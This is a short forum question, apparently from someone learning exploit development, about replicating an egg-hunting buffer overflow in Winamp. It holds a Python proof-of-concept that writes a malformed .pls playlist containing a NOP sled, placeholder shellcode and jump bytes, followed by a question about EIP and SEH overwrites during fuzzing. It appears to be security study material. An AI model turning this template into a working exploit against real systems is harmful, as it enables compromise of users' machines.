I'm trying to replicated the "egg hunting" exploitation for the Winmap .
I started using the POC code provided (I rewrote it in Python) :
__author__ = 'HSN'
#!/usr/bin/python -w
start = "[playlist]\r\nFile1=\\\\"
#[playlist]\r\nFile1=\\\\"
nop = "\x90"*856
shellcode ="\xcc"*166
jmp = "\x41"*4+"\x83"*8+"\x90"*4
end="\r\nTitle1=pwnd\r\nLength1=512\r\nNumberOfEntries=1\r\nVersion=2\r\n"
evil = start + nop + shellcode + jmp + end
print len(evil)
f = open("boom.pls", "w")
f.write(evil)
When applying the previous code, the application crashes as expected (EIP is overwritten )
However, I wanted to replicated the fuzzing process (at least to get the EIP offset myself) However, whenever i change the content of my buffer (While preserving the total length and taking bad characters into account) the application crashes in a way similar to what happens when SEH is overwritten.
